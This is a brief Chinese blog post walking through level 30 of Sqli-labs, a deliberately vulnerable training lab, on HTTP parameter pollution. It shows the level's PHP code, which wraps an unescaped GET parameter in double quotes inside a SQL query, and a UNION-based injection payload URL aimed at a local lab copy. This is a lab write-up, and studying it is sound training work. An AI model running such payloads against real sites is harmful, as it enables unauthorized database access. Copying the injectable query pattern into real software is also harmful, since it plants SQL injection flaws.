Apr 09 2020

Sqli-labs Less-30 HPP参数污染攻击

作者: 绝缘体..   发布: 2020-04-09 22:19   分类: 未分类   阅读:   抢沙发  
 
更多

Less-30与less-29原理是一致的,区别仅仅是将id的’变为了”,我们可以看到less-30的sql语句为:

$id=$_GET['id'];
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

所以payload为:

http://127.0.0.1/sql/Less-30/login.php?id=1&id=-1″ union select 1,database(),3–+

 

打赏

本文固定链接: https://www.cxy163.net/archives/4967 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-30 HPP参数污染攻击 | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. python黑帽子(第五章)
  2. python黑帽子(第二章)
  3. PHP给源代码加密的几种方法
  4. Swoole实践:4-使用Swoole实现在线聊天
  5. php的password_hash方法详解
  6. 使用中间件记录Laravel慢请求
  7. laravel 缓存系统的使用
  8. 最常用的100个PHP函数排行榜
  9. php出现的No input file specified
  10. go ants源码分析
  11. Xray学习
  12. UPUPW多站点如何配置ssl证书?
  13. AWS S3 存储桶管理:PHP SDK 教程
  14. 如何在 Laravel 代码中正确地使用数据库事务
  15. 分布式自增id->snowflake算法的php实现版本
  16. 使用 Let\'s Encrypt创建免费的https证书

Sqli-labs Less-30 HPP参数污染攻击:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter